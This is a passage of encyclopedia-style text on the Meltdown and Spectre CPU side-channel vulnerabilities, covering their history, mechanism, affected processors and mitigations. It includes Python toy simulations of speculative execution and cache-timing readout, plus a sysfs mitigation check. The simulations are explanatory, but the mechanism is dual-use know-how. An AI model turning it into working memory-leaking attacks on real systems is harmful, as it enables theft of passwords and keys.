patches, were reported.
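On Linux, the kernel reports its Meltdown mitigation status through sysfs, which is one practical way to check whether a given machine has the patches discussed above. A minimal check might look like the following; the sysfs file exists only on kernels new enough to carry the mitigations, so the function falls back gracefully elsewhere:

```python
from pathlib import Path

def meltdown_status() -> str:
    """Return the kernel's reported Meltdown mitigation status, if any.

    Modern Linux kernels expose one file per known CPU vulnerability
    under /sys/devices/system/cpu/vulnerabilities/.
    """
    p = Path("/sys/devices/system/cpu/vulnerabilities/meltdown")
    try:
        return p.read_text().strip()   # e.g. "Mitigation: PTI"
    except OSError:
        return "no status available"   # older kernel or non-Linux system

print(meltdown_status())
```

On a patched kernel the file typically reads "Mitigation: PTI", reflecting the kernel page-table isolation workaround.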
Nonetheless, according to Dell: "No 'real-world' exploits of these vulnerabilities [i.e., Meltdown and Spectre] have been reported to date [26 January 2018], though researchers have produced proof-of-concepts." Further, recommended preventions include: "promptly adopting software updates, avoiding unrecognized hyperlinks and websites, not downloading files or applications from unknown sources ... following secure password protocols ... [using] security software to help protect against malware (advanced threat prevention software or anti-virus)." On 25 January 2018, the current status and possible future considerations in solving the Meltdown and Spectre vulnerabilities were presented. On 15 March 2018, Intel reported that it would redesign its CPUs to help protect against Meltdown and the related Spectre vulnerabilities (especially Meltdown and Spectre-V2, but not Spectre-V1), and expected to release the newly redesigned processors later in 2018. On 8 October 2018, Intel was reported to have added hardware and firmware mitigations regarding the Spectre and Meltdown vulnerabilities to its latest processors.

Overview
Meltdown exploits a race condition inherent in the design of many modern CPUs. This occurs between memory access and privilege checking during instruction processing. Combined with a cache side-channel attack, this vulnerability allows a process to bypass the normal privilege checks that isolate the exploiting process from accessing data belonging to the operating system and other running processes. The vulnerability allows an unauthorized process to read data from any address that is mapped to the current process's memory space. Because the affected processors use instruction pipelining, the data from an unauthorized address will almost always be temporarily loaded into the CPU's cache during out-of-order execution, from which the data can be recovered.
This can occur even if the original read instruction fails due to privilege checking, or if it never produces a readable result. Since many operating systems map physical memory, kernel processes, and other running user space processes into the address space of every process, Meltdown effectively makes it possible for a rogue process to read any physical, kernel or other processes' mapped memory—regardless of whether it should be able to do so. Defenses against Meltdown would require avoiding the use of memory mapping in a manner vulnerable to such exploits (i.e. a software-based solution) or avoidance of the underlying race condition (i.e. a modification to the CPUs' microcode or execution path). The vulnerability is viable on any operating system in which privileged data is mapped into virtual memory for unprivileged processes—which includes many present-day operating systems. Meltdown could potentially impact a wider range of computers than presently identified, as there is little to no variation in the microprocessor families used by these computers. A Meltdown attack cannot be detected if it is carried out.

History
On 8 May 1995, a paper called "The Intel 80x86 Processor Architecture: Pitfalls for Secure Systems" published at the 1995 IEEE Symposium on Security and Privacy warned against a covert timing channel in the CPU cache and translation lookaside buffer (TLB). This analysis was performed under the auspices of the National Security Agency's Trusted Products Evaluation Program (TPEP). In July 2012, Apple's XNU kernel (used in macOS, iOS and tvOS, among others) adopted kernel address space layout randomization (KASLR) with the release of OS X Mountain Lion 10.8. In essence, the base of the system, including its kernel extensions (kexts) and memory zones, is randomly relocated during the boot process in an effort to reduce the operating system's vulnerability to attacks. In March 2014, the Linux kernel adopted KASLR to mitigate address leaks.
On 8 August 2016, Anders Fogh and Daniel Gruss presented "Using Undocumented CPU Behavior to See Into Kernel Mode and Break KASLR in the Process" at the Black Hat 2016 conference. On 10 August 2016, Moritz Lipp et al. of TU Graz published "ARMageddon: Cache Attacks on Mobile Devices" in the proceedings of the 25th USENIX Security Symposium. Even though focused on ARM, it laid the groundwork for the attack vector. On 27 December 2016, at 33C3, Clémentine Maurice and Moritz Lipp of TU Graz presented their talk "What could possibly go wrong with <insert x86 instruction here>? Side effects include side-channel attacks and bypassing kernel ASLR", which already outlined what was coming. On 1 February 2017, the CVE numbers 2017-5715, 2017-5753 and 2017-5754 were assigned to Intel. On 27 February 2017, Bosman et al. of Vrije Universiteit Amsterdam published their findings on how address space layout randomization (ASLR) could be abused on cache-based architectures at the NDSS Symposium. On 27 March 2017, researchers at Austria's Graz University of Technology developed a proof of concept that could grab RSA keys from Intel SGX enclaves running on the same system within five minutes by using certain CPU instructions in lieu of a fine-grained timer to exploit cache DRAM side channels. In June 2017, KASLR was found to have a large class of new vulnerabilities. Research at Graz University of Technology showed how to solve these vulnerabilities by preventing all access to unauthorized pages. A presentation on the resulting KAISER technique was submitted for the Black Hat congress in July 2017, but was rejected by the organizers. Nevertheless, this work led to kernel page-table isolation (KPTI, originally known as KAISER) in 2017, which was confirmed to eliminate a large class of security bugs, including some limited protection against the not-yet-discovered Meltdown – a fact confirmed by the Meltdown authors.
In July 2017, research made public on the CyberWTF website by security researcher Anders Fogh outlined the use of a cache timing attack to read kernel space data by observing the results of speculative operations conditioned on data fetched with invalid privileges. Meltdown was discovered independently by Jann Horn from Google's Project Zero, Werner Haas and Thomas Prescher from Cyberus Technology, as well as Daniel Gruss, Moritz Lipp, Stefan Mangard and Michael Schwarz from Graz University of Technology. The same research teams that discovered Meltdown also discovered Spectre. In October 2017, Kernel ASLR support on amd64 was added to NetBSD-current, making NetBSD the first totally open-source BSD system to support kernel address space layout randomization (KASLR). However, the partially open-source Apple Darwin, which forms the foundation of macOS and iOS (among others), is based on FreeBSD; KASLR was added to its XNU kernel in 2012 as noted above. On 14 November 2017, security researcher Alex Ionescu publicly mentioned changes in the new version of Windows 10 that would cause some speed degradation without explaining the necessity for the changes, just referring to similar changes in Linux. After affected hardware and software vendors had been made aware of the issue on 28 July 2017, the two vulnerabilities were made public jointly, on 3 January 2018, several days ahead of the coordinated release date of 9 January 2018 as news sites started reporting about commits to the Linux kernel and mails to its mailing list. As a result, patches were not available for some platforms, such as Ubuntu, when the vulnerabilities were disclosed. On 28 January 2018, Intel was reported to have shared news of the Meltdown and Spectre security vulnerabilities with Chinese technology companies before notifying the U.S. government of the flaws. 
The security vulnerability was called Meltdown because "the vulnerability basically melts security boundaries which are normally enforced by the hardware." On 8 October 2018, Intel was reported to have added hardware and firmware mitigations regarding the Spectre and Meltdown vulnerabilities to its latest processors. In November 2018, two new variants of the attacks were revealed. Researchers attempted to compromise CPU protection mechanisms using code to exploit weaknesses in memory protection and the instruction. They also attempted, but failed, to exploit CPU operations for memory alignment, division by zero, supervisor modes, segment limits, invalid opcodes, and non-executable code.

Mechanism
Meltdown relies on a CPU race condition that can arise between instruction execution and privilege checking. Put briefly, instruction execution leaves side effects that constitute information not hidden from the process by the privilege check. The process carrying out Meltdown then uses these side effects to infer the values of memory-mapped data, bypassing the privilege check. The following provides an overview of the exploit and the memory mapping that is its target. The attack is described in terms of an Intel processor running Microsoft Windows or Linux, the main test targets used in the original paper, but it also affects other processors and operating systems, including macOS (aka OS X), iOS, and Android.

Background – modern CPU design
Modern computer processors use a variety of techniques to gain high levels of efficiency. Four widely used features are particularly relevant to Meltdown:
Virtual (paged) memory, also known as memory mapping – used to make memory access more efficient and to control which processes can access which areas of memory. A modern computer usually runs many processes in parallel.
In an operating system such as Windows or Linux, each process is given the impression that it alone has complete use of the computer's physical memory and may do with it as it likes. In reality it is allocated memory from the physical memory, which acts as a "pool" of available memory, when it first tries to use any given memory address (by trying to read or write to it). This allows multiple processes, including the kernel or operating system itself, to co-habit on the same system, but retain their individual activity and integrity without being affected by other running processes, and without being vulnerable to interference or unauthorized data leaks caused by a rogue process.

Privilege levels, or protection domains – provide a means by which the operating system can control which processes are authorized to read which areas of virtual memory.

As virtual memory permits a computer to refer to vastly more memory than it will ever physically contain, the system can be greatly sped up by "mapping" every process and its in-use memory – in effect all memory of all active processes – into every process's virtual memory. In some systems all physical memory is mapped as well, for further speed and efficiency. This is usually considered safe, because the operating system can rely on privilege controls built into the processor itself to limit which areas of memory any given process is permitted to access. An attempt to access authorized memory succeeds immediately; an attempt to access unauthorized memory raises an exception and voids the read instruction, which fails. Either the calling process or the operating system directs what happens if an attempt is made to read from unauthorized memory – typically it causes an error condition and the process that attempted the read is terminated.
As unauthorized reads are usually not part of normal program execution, it is much faster to use this approach than to pause the process every time it executes some function that requires privileged memory to be accessed, in order to map that memory into a readable address space.

Instruction pipelining and speculative execution – used to allow instructions to execute in the most efficient manner possible, if necessary allowing them to run out of order or in parallel across various processing units within the CPU, so long as the final outcome is correct.

Modern processors commonly contain numerous separate execution units, and a scheduler that decodes instructions and decides, at the time they are executed, the most efficient way to execute them. This might involve the decision that two instructions can execute at the same time, or even out of order, on different execution units (known as "instruction pipelining"). So long as the correct outcome is still achieved, this maximizes efficiency by keeping all of the processor's execution units in use as much as possible. Some instructions, such as conditional branches, will lead to one of two different outcomes depending on a condition: for example, if a value is 0, one action will be taken, and otherwise a different action. In some cases the CPU may not yet know which branch to take, for instance because a value is uncached. Rather than waiting to learn the correct option, the CPU may proceed immediately (speculative execution). If so, it can either guess the correct option (predictive execution) or even take both (eager execution). If it executes the incorrect option, the CPU will attempt to discard all effects of its incorrect guess.
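The key property described above – that architectural results of a squashed speculation are discarded while cache state is not – can be illustrated with a toy model. This is purely a sketch; the `ToyCPU` class and its method names are illustrative inventions, not real CPU interfaces.

```python
# Toy model (illustrative only): a CPU that speculatively executes past an
# unresolved branch, then squashes architectural results on a misprediction.
# The key point: the data cache is NOT rolled back.

class ToyCPU:
    def __init__(self):
        self.cache = set()        # addresses currently cached
        self.registers = {}       # architectural state

    def speculative_load(self, reg, addr):
        """Execute a load before the branch condition is known."""
        self.cache.add(addr)      # side effect: line is fetched into cache
        self.registers[reg] = f"mem[{addr}]"

    def squash(self):
        """Branch was mispredicted: discard architectural results..."""
        self.registers.clear()    # ...but the cache contents remain!

cpu = ToyCPU()
cpu.speculative_load("r1", 0x1000)   # executed down the wrong path
cpu.squash()

print(cpu.registers)          # {} -- architectural effects are gone
print(0x1000 in cpu.cache)    # True -- microarchitectural trace survives
```

The surviving cache line is exactly the "side effect" that Meltdown and Spectre turn into a communication channel.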
(See also: branch predictor)

CPU cache – a modest amount of memory within the CPU used to ensure it can work at high speed, to speed up memory access, and to facilitate "intelligent" execution of instructions in an efficient manner.

From the perspective of a CPU, the computer's physical memory is slow to access. Also, the instructions a CPU runs are very often repetitive, or access the same or similar memory numerous times. To maximize efficient use of the CPU's resources, modern CPUs often have a modest amount of very fast on-chip memory, known as "CPU cache". When data is accessed or an instruction is read from physical memory, a copy of that information is routinely saved in the CPU cache at the same time. If the CPU later needs the same instruction or memory contents again, it can obtain it with minimal delay from its own cache rather than waiting for a request to physical memory to complete.

Meltdown exploit

Ordinarily, the mechanisms described above are considered secure. They provide the basis for most modern operating systems and processors. Meltdown exploits the way these features interact to bypass the CPU's fundamental privilege controls and access privileged and sensitive data from the operating system and other processes. To understand Meltdown, consider the data that is mapped in virtual memory (much of which the process is not supposed to be able to access) and how the CPU responds when a process attempts to access unauthorized memory. The process is running on a vulnerable version of Windows, Linux, or macOS, on a 64-bit processor of a vulnerable type. This is a very common combination across almost all desktop computers, notebooks, laptops, servers and mobile devices. The CPU encounters an instruction accessing the value, A, at an address forbidden to the process by the virtual memory system and the privilege check. Because of speculative execution, the instruction is scheduled and dispatched to an execution unit.
This execution unit then schedules both the privilege check and the memory access. The CPU encounters an instruction accessing address Base+A, with Base chosen by the attacker. This instruction is also scheduled and dispatched to an execution unit. The privilege check informs the execution unit that the address of the value, A, involved in the access is forbidden to the process (per the information stored by the virtual memory system), and thus the instruction should fail and subsequent instructions should have no effects. Because these instructions were speculatively executed, however, the data at Base+A may have been cached before the privilege check – and may not have been undone by the execution unit (or any other part of the CPU). If this is indeed the case, the mere act of caching constitutes a leak of information in and of itself. At this point, Meltdown intervenes. The process executes a timing attack by executing instructions referencing memory operands directly. To be effective, the operands of these instructions must be at addresses which cover the possible address, Base+A, of the rejected instruction's operand. Because the data at the address referred to by the rejected instruction, Base+A, was cached nevertheless, an instruction referencing the same address directly will execute faster. The process can detect this timing difference and determine the address, Base+A, that was calculated for the rejected instruction – and thus determine the value A at the forbidden memory address. Meltdown uses this technique in sequence to read every address of interest at high speed, and depending on other running processes, the result may contain passwords, encryption data, and any other sensitive information from any address of any process that exists in its memory map. In practice, because cache side-channel attacks are slow, it is faster to extract data one bit at a time (only 2 × 8 = 16 cache probes are needed to read a byte, rather than 256 if all 8 bits were read at once).
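The bit-by-bit readout can be simulated without any real hardware access. In the sketch below, the "cache" is modeled as a set of touched probe-array lines, and the "timing phase" is a simple membership test standing in for a fast-versus-slow access measurement; `SECRET`, `LINE`, and the function names are illustrative, not part of any real exploit code.

```python
# Simulation (not a real exploit): recovering a secret byte one bit at a time
# through a cache side channel. A real attack infers cache state from access
# latency; here the "cache" is modeled as a set of touched probe-array lines.

SECRET = 0b10110010          # stand-in for a forbidden kernel byte
LINE = 4096                  # one probe-array slot per page, to defeat prefetch

def speculative_access(cache, bit_index):
    """Model the transient window: the forbidden load happens, a dependent
    load touches probe[bit * LINE], then the fault squashes everything
    EXCEPT the cache line that was brought in."""
    bit = (SECRET >> bit_index) & 1
    cache.add(bit * LINE)    # side effect survives the squash

recovered = 0
for i in range(8):
    cache = set()            # attacker flushes the probe array (e.g. clflush)
    speculative_access(cache, i)
    # Timing phase: only two probe addresses per bit (16 per byte, not 256).
    hit_one = (1 * LINE) in cache   # "fast" access => cached => bit was 1
    recovered |= (1 if hit_one else 0) << i

print(bin(recovered))        # 0b10110010 -- matches SECRET
```

Repeating this loop over successive forbidden addresses is what lets Meltdown walk through mapped kernel memory at high speed.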
Impact

The impact of Meltdown depends on the design of the CPU, the design of the operating system (specifically how it uses memory paging), and the ability of a malicious party to get any code run on that system, as well as the value of any data it could read if able to execute.

CPU – Many of the most widely used modern CPUs from the late 1990s until early 2018 have the required exploitable design. However, the weakness can be mitigated in CPU design. A CPU that detected and avoided memory access for unprivileged instructions, or was not susceptible to cache timing attacks or similar probes, or removed cache entries upon non-privilege detection (and did not allow other processes to access them until authorized) as part of abandoning the instruction, could not be exploited in this manner. Some observers consider that all software solutions will be "workarounds" and the only true solution is to update affected CPU designs and remove the underlying weakness.

Operating system – Most of the widely used and general-purpose operating systems use privilege levels and virtual memory mapping as part of their design. Meltdown can access only those pages that are memory mapped, so the impact is greatest if all active memory and processes are memory mapped in every process, and least if the operating system is designed so that almost nothing can be reached in this manner. An operating system might also be able to mitigate in software to an extent by ensuring that probe attempts of this kind will not reveal anything useful. Modern operating systems use memory mapping to increase speed, so this could lead to performance loss.

Virtual machine – A Meltdown attack cannot be used to break out of a virtual machine, i.e., in fully virtualized machines guest user space can still read from guest kernel space, but not from host kernel space.
The bug enables reading memory from the address space represented by the same page table, meaning that it does not work across page tables. That is, guest-to-host page tables are unaffected; only guest-to-same-guest or host-to-host access is possible (and, trivially, host-to-guest, since the host can already access the guest pages). This means different VMs on the same fully virtualized hypervisor cannot access each other's data, but different users on the same guest instance can access each other's data.

Embedded device – Among the vulnerable chips are those made by ARM and Intel designed for standalone and embedded devices, such as mobile phones, smart TVs, networking equipment, vehicles, hard drives, industrial control, and the like. As with all vulnerabilities, if a third party cannot run code on the device, its internal vulnerabilities remain unexploitable. For example, an ARM processor in a cellphone or Internet of Things "smart" device may be vulnerable, but the same processor used in a device that cannot download and run new code, such as a kitchen appliance or hard drive controller, is believed not to be exploitable.

The specific impact depends on the implementation of the address translation mechanism in the OS and the underlying hardware architecture. The attack can reveal the content of any memory that is mapped into a user address space, even if otherwise protected. For example, before kernel page-table isolation was introduced, most versions of Linux mapped all physical memory into the address space of every user-space process; the mapped addresses are (mostly) protected, making them unreadable from user-space and accessible only when transitioned into the kernel.
The existence of these mappings makes transitioning to and from the kernel faster, but is unsafe in the presence of the Meltdown vulnerability, as the contents of all physical memory (which may contain sensitive information such as passwords belonging to other processes or the kernel) can then be obtained via the above method by any unprivileged process from user-space. According to the researchers, "every Intel processor that implements out-of-order execution is potentially affected, which is effectively every processor since 1995 (except Intel Itanium and Intel Atom before 2013)." Intel responded to the reported security vulnerabilities with an official statement. The vulnerability is expected to impact major cloud providers, such as Amazon Web Services (AWS) and Google Cloud Platform. Cloud providers allow users to execute programs on the same physical servers where sensitive data might be stored, and rely on safeguards provided by the CPU to prevent unauthorized access to the privileged memory locations where that data is stored, a feature that the Meltdown exploit circumvents. The original paper reports that paravirtualization (Xen) and containers such as Docker, LXC, and OpenVZ are affected. The authors report that an attack on a fully virtualized machine allows the guest user space to read from the guest kernel memory, but not from the host kernel space.

Affected hardware

The Meltdown vulnerability primarily affects Intel microprocessors, but the ARM Cortex-A75 and IBM's Power microprocessors are also affected. The vulnerability does not affect AMD microprocessors. When the effect of Meltdown was first made public, Intel countered that the flaws affect all processors, but AMD denied this, saying "we believe AMD processors are not susceptible due to our use of privilege level protections within paging architecture".
Researchers have indicated that the Meltdown vulnerability is exclusive to Intel processors, while the Spectre vulnerability can possibly affect some Intel, AMD, and ARM processors. However, ARM announced that some of their processors were vulnerable to Meltdown. Google has reported that any Intel processor since 1995 with out-of-order execution is potentially vulnerable to the Meltdown vulnerability (this excludes Itanium and pre-2013 Intel Atom CPUs). Intel introduced speculative execution to its processors with the P6 family microarchitecture and the Pentium Pro IA-32 microprocessor in 1995. ARM has reported that the majority of their processors are not vulnerable, and published a list of the specific processors that are affected. The ARM Cortex-A75 core is affected directly by both the Meltdown and Spectre vulnerabilities, while the Cortex-R7, Cortex-R8, Cortex-A8, Cortex-A9, Cortex-A15, Cortex-A17, Cortex-A57, Cortex-A72 and Cortex-A73 cores are affected only by the Spectre vulnerability. This contradicts some early statements that characterized the Meltdown vulnerability as Intel-only. A large portion of current mid-range Android handsets use the Cortex-A53 or Cortex-A55 in an octa-core arrangement and are not affected by either the Meltdown or Spectre vulnerability, as they do not perform out-of-order execution. This includes devices with the Qualcomm Snapdragon 630, Snapdragon 626, Snapdragon 625, and all Snapdragon 4xx processors based on A53 or A55 cores. Also, no Raspberry Pi computers are vulnerable to either Meltdown or Spectre, except the newly released Raspberry Pi 4, which uses the ARM Cortex-A72 CPU. IBM has also confirmed that its Power CPUs are affected by both CPU attacks. Red Hat has publicly announced that the exploits also affect IBM System Z, POWER8, and POWER9 systems.
Oracle has stated that V9-based SPARC systems (T5, M5, M6, S7, M7, M8, M10, M12 processors) are not affected by Meltdown, though older SPARC processors that are no longer supported may be impacted.

Mitigation

Mitigation of the vulnerability requires changes to operating system kernel code, including increased isolation of kernel memory from user-mode processes. Linux kernel developers have referred to this measure as kernel page-table isolation (KPTI). KPTI patches were developed for Linux kernel 4.15 and released as backports in kernels 4.14.11 and 4.9.75. Red Hat released kernel updates for Red Hat Enterprise Linux versions 6 and 7, and CentOS likewise released kernel updates for CentOS 6 and CentOS 7. Apple included mitigations in macOS 10.13.2, iOS 11.2, and tvOS 11.2. These were released a month before the vulnerabilities were made public. Apple has stated that watchOS and the Apple Watch are not affected. Additional mitigations were included in a Safari update, as well as a supplemental update to macOS 10.13 and iOS 11.2.2. Microsoft released an emergency update to Windows 10, 8.1, and 7 SP1 to address the vulnerability on 3 January 2018, as well as Windows Server (including Server 2008 R2, Server 2012 R2, and Server 2016) and Windows Embedded Industry. These patches are incompatible with third-party antivirus software that uses unsupported kernel calls; systems running incompatible antivirus software will not receive this or any future Windows security update until it is patched, and the software adds a special registry key affirming its compatibility. The update was found to have caused issues on systems running certain AMD CPUs, with some users reporting that their Windows installations did not boot at all after installation. On 9 January 2018, Microsoft paused the distribution of the update to systems with affected CPUs while it investigated and addressed this bug.
It was reported that implementation of KPTI may lead to a reduction in CPU performance, with some researchers claiming up to 30% loss in performance, depending on usage, though Intel considered this to be an exaggeration. It was reported that Intel processor generations that support process-context identifiers (PCID), a feature introduced with Westmere and available on all chips from the Haswell architecture onward, were not as susceptible to performance losses under KPTI as older generations that lack it. This is because the selective translation lookaside buffer (TLB) flushing enabled by PCID (also called address space number or ASN under the Alpha architecture) allows the shared TLB behavior crucial to the exploit to be isolated across processes, without constantly flushing the entire cache – the primary reason for the cost of mitigation. A statement by Intel said that "any performance impacts are workload-dependent, and, for the average computer user, should not be significant and will be mitigated over time". Phoronix benchmarked several popular PC games on a Linux system with Intel's Coffee Lake Core i7-8700K CPU and KPTI patches installed, and found that any performance impact was little to non-existent. In other tests, including synthetic I/O benchmarks and databases such as PostgreSQL and Redis, a performance impact was found, amounting to tens of percent for some workloads. More recently, related tests involving AMD's FX and Intel's Sandy Bridge and Ivy Bridge CPUs have been reported. Several procedures to help protect home computers and related devices from the Meltdown and Spectre security vulnerabilities have been published. Meltdown patches may produce performance loss. On 18 January 2018, unwanted reboots, even for newer Intel chips, due to Meltdown and Spectre patches, were reported.
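Why PCID softens the cost of KPTI can be sketched with a toy TLB model: address-space tags let translations from different contexts coexist, so a switch between user and kernel page tables does not have to discard every entry. The `TLB` class below is an illustrative simplification, not a description of any real hardware interface.

```python
# Toy model of why PCID helps under KPTI: with address-space tags, a context
# switch need not flush the whole TLB. Purely illustrative.

class TLB:
    def __init__(self, pcid_supported):
        self.pcid_supported = pcid_supported
        self.entries = {}                     # (pcid, vaddr) -> paddr

    def fill(self, pcid, vaddr, paddr):
        self.entries[(pcid, vaddr)] = paddr

    def context_switch(self):
        if self.pcid_supported:
            pass                              # tags keep entries distinct
        else:
            self.entries.clear()              # full flush: every entry lost

tlb = TLB(pcid_supported=True)
tlb.fill(pcid=1, vaddr=0x1000, paddr=0x9000)
tlb.context_switch()
print(len(tlb.entries))                       # 1 -- translations survive

legacy = TLB(pcid_supported=False)
legacy.fill(pcid=0, vaddr=0x1000, paddr=0x9000)
legacy.context_switch()
print(len(legacy.entries))                    # 0 -- must be refilled, slower
```

Under KPTI the kernel switches page tables on every entry and exit, so pre-PCID chips pay the full-flush cost far more often, matching the reported performance gap between generations.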
According to Dell: "No 'real-world' exploits of these vulnerabilities [i.e., Meltdown and Spectre] have been reported to date [26 January 2018], though researchers have produced proof-of-concepts." Further, recommended preventions include: "promptly adopting software updates, avoiding unrecognized hyperlinks and websites, not downloading files or applications from unknown sources ... following secure password protocols ... [using] security software to help protect against malware (advanced threat prevention software or anti-virus)." On 25 January 2018, the current status and possible future considerations in solving the Meltdown and Spectre vulnerabilities were presented. In March 2018, Intel announced that it had designed hardware fixes for future processors for Meltdown and Spectre-V2 only, but not Spectre-V1. The vulnerabilities were mitigated by a new partitioning system that improves process and privilege-level separation. The company also announced that it had developed Intel Microcode workarounds for processors dating back to 2013, and that it had plans to develop them for most processors dating back to 2007, including the Core 2 Duo; however, a month later, in April 2018, it announced it was backing off that plan for a number of processor families and that no processor earlier than 2008 would have a patch available. On 8 October 2018, Intel was reported to have added hardware and firmware mitigations regarding the Spectre and Meltdown vulnerabilities to its latest processors.
See also

Foreshadow (security vulnerability)
Intel Management Engine – an Intel subsystem which was discovered to have a major security vulnerability in 2017
Microarchitectural Data Sampling – another set of vulnerabilities, including ZombieLoad, that can leak data in Intel microprocessors
Pentium F00F bug
Pentium FDIV bug
Rogue System Register Read (RSRR) – a related vulnerability also known as Variant 3a
Row hammer – an unintended side effect in dynamic random-access memory causing memory cells to interact electrically
SPOILER – a Spectre-like, though unrelated, vulnerability affecting only Intel microprocessors, disclosed in 2019
Transient execution CPU vulnerabilities

External links

Official website of the Meltdown and Spectre vulnerabilities
Google Project Zero write-up
CVE-2017-5754 at the National Vulnerability Database
Meltdown proof-of-concept released by the researchers who published the Meltdown paper
Am I Affected by Meltdown – Meltdown checker tool created by Raphael S. Carvalho
Meltdown/Spectre checker, Gibson Research Corporation
Spectre (security vulnerability)
Spectre is a class of security vulnerabilities that affects modern microprocessors that perform branch prediction and other forms of speculation. On most processors, the speculative execution resulting from a branch misprediction may leave observable side effects that may reveal private data to attackers. For example, if the pattern of memory accesses performed by such speculative execution depends on private data, the resulting state of the data cache constitutes a side channel through which an attacker may be able to extract information about the private data using a timing attack. Two Common Vulnerabilities and Exposures IDs related to Spectre (bounds check bypass, Spectre-V1, Spectre 1.0; and branch target injection, Spectre-V2) have been issued. JIT engines used for JavaScript were found to be vulnerable: a website can read data stored in the browser for another website, or the browser's memory itself. In early 2018, Intel reported that it would redesign its CPUs to help protect against the Spectre and related Meltdown vulnerabilities (especially Spectre variant 2 and Meltdown, but not Spectre variant 1). On 8 October 2018, Intel was reported to have added hardware and firmware mitigations regarding the Spectre and Meltdown vulnerabilities to its latest processors.

History

In 2002 and 2003, Yukiyasu Tsunoo and colleagues from NEC showed how to attack the MISTY and DES symmetric key ciphers, respectively. In 2005, Daniel Bernstein from the University of Illinois, Chicago reported an extraction of an OpenSSL AES key via a cache timing attack, and Colin Percival had a working attack on the OpenSSL RSA key using the Intel processor's cache. In 2013, Yuval Yarom and Katrina Falkner from the University of Adelaide showed how measuring the access time to data lets a nefarious application determine whether the information was read from the cache.
If it was read from the cache, the access time would be very short, meaning the data read could contain the private key of encryption algorithms. This technique was used to successfully attack GnuPG, AES and other cryptographic implementations. In January 2017, Anders Fogh gave a presentation at the Ruhruniversität Bochum about automatically finding covert channels, especially on processors with a pipeline used by more than one processor core. Spectre proper was discovered independently by Jann Horn from Google's Project Zero and by Paul Kocher in collaboration with Daniel Genkin, Mike Hamburg, Moritz Lipp and Yuval Yarom. Microsoft Vulnerability Research extended it to browsers' JavaScript JIT engines. It was made public in conjunction with another vulnerability, Meltdown, on 3 January 2018, after the affected hardware vendors had already been made aware of the issue on 1 June 2017. The vulnerability was called Spectre because it was "based on the root cause, speculative execution. As it is not easy to fix, it will haunt us for quite some time." On 28 January 2018, it was reported that Intel had shared news of the Meltdown and Spectre security vulnerabilities with Chinese technology companies before notifying the U.S. government of the flaws. On 29 January 2018, Microsoft was reported to have released a Windows update that disabled the problematic Intel microcode fix issued earlier for the Spectre variant 2 attack, which had in some cases caused reboots, system instability, and data loss or corruption. Woody Leonhard of ComputerWorld expressed concern about installing the new Microsoft patch. Since the disclosure of Spectre and Meltdown in January 2018, much research has been done on vulnerabilities related to speculative execution. On 3 May 2018, eight additional Spectre-class flaws, provisionally named Spectre-NG by c't (a German computer magazine), were reported, affecting Intel and possibly AMD and ARM processors.
Intel reported that they were preparing new patches to mitigate these flaws. Affected are all Core i processors and Xeon derivatives since Nehalem (2010) and Atom-based processors since 2013. Intel postponed the release of its microcode updates to 10 July 2018. On 21 May 2018, Intel published information on the first two Spectre-NG class side-channel vulnerabilities, Rogue System Register Read (Variant 3a) and Speculative Store Bypass (Variant 4), also referred to as Intel SA-00115 and HP PSR-2018-0074, respectively. According to Amazon Deutschland, Cyberus Technology, SYSGO, and Colin Percival (FreeBSD), Intel revealed details on the third Spectre-NG variant, Lazy FP State Restore (Intel SA-00145), on 13 June 2018. It is also known as Lazy FPU state leak (abbreviated "LazyFP") and "Spectre-NG 3". On 10 July 2018, Intel revealed details on another Spectre-NG class vulnerability, called "Bounds Check Bypass Store" (BCBS) or "Spectre 1.1", which is able to write as well as read out of bounds. Another variant, named "Spectre 1.2", was mentioned as well. In late July 2018, researchers at the universities of Saarland and California revealed ret2spec (aka "Spectre v5") and SpectreRSB, new types of code execution vulnerabilities using the Return Stack Buffer (RSB). At the end of July 2018, researchers at the University of Graz revealed "NetSpectre", a new type of remote attack similar to Spectre V1, but which does not need attacker-controlled code to be run on the target device at all. On 8 October 2018, Intel was reported to have added hardware and firmware mitigations regarding the Spectre and Meltdown vulnerabilities to its latest processors. In November 2018, five new variants of the attacks were revealed. Researchers attempted to compromise CPU protection mechanisms using code to exploit the CPU pattern history table, branch target buffer, return stack buffer, and branch history table.
In August 2019, a related transient execution CPU vulnerability, Spectre SWAPGS, was reported. In late April 2021, a related vulnerability was discovered that breaks through the security systems designed to mitigate Spectre through use of the micro-op cache. The vulnerability is known to affect Skylake and later processors from Intel and Zen-based processors from AMD.

Mechanism

Spectre is a vulnerability that tricks a program into accessing arbitrary locations in the program's memory space. An attacker may read the content of accessed memory, and thus potentially obtain sensitive data. Instead of a single easy-to-fix vulnerability, the Spectre white paper describes a whole class of potential vulnerabilities. They are all based on exploiting side effects of speculative execution, a common means of hiding memory latency and so speeding up execution in modern microprocessors. In particular, Spectre centers on branch prediction, which is a special case of speculative execution. Unlike the related Meltdown vulnerability disclosed at the same time, Spectre does not rely on a specific feature of a single processor's memory management and protection system, but is instead a more generalized idea. The starting point of the white paper is that of a side-channel timing attack applied to the branch prediction machinery of modern out-of-order executing microprocessors. While at the architectural level documented in processor data books any results of misprediction are specified to be discarded after the fact, the resulting speculative execution may still leave side effects, like loaded cache lines. These can then affect the so-called non-functional aspects of the computing environment later on. If such side effects, including but not limited to memory access timing, are visible to a malicious program, and can be engineered to depend on sensitive data held by the victim process, then these side effects can result in such data becoming discernible.
This can happen despite the formal architecture-level security arrangements working as designed; in this case, lower, microarchitecture-level optimizations to code execution can leak information not essential to the correctness of normal program execution. The Spectre paper displays the attack in four essential steps: First, it shows that branch prediction logic in modern processors can be trained to reliably hit or miss based on the internal workings of a malicious program. It then goes on to show that the subsequent difference between cache hits and misses can be reliably timed, so that what should have been a simple non-functional difference can in fact be subverted into a covert channel which extracts information from an unrelated process's inner workings. Thirdly, the paper synthesizes the results with return-oriented programming exploits and other principles with a simple example program and a JavaScript snippet run under a sandboxing browser; in both cases, the entire address space of the victim process (i.e. the contents of a running program) is shown to be readable by simply exploiting speculative execution of conditional branches in code generated by a stock compiler or the JavaScript machinery present in an existing browser. The basic idea is to search existing code for places where speculation touches upon otherwise inaccessible data, manipulate the processor into a state where speculative execution has to contact that data, and then time the side effect of the processor being faster, if its by-now-prepared prefetch machinery indeed did load a cache line. Finally, the paper concludes by generalizing the attack to any non-functional state of the victim process. It briefly discusses even such highly non-obvious non-functional effects as bus arbitration latency. 
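The first two steps of the paper's attack – mistraining the branch predictor, then letting a mispredicted speculative path touch secret-dependent memory – can be modeled in a few lines. Everything here is an illustrative simplification (the two-bit saturating counter, the names `victim`, `array1`, `memory`); it is a sketch of the bounds-check-bypass pattern, not real exploit code.

```python
# Toy model of Spectre variant 1 (bounds check bypass). The predictor and
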